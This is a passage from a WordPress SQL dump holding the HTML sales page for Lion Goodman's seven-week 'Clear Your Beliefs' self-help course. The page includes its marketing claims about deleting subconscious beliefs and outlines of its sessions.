'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(950, 4194, '2014-06-17 17:07:31', '2014-06-17 22:07:31', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship 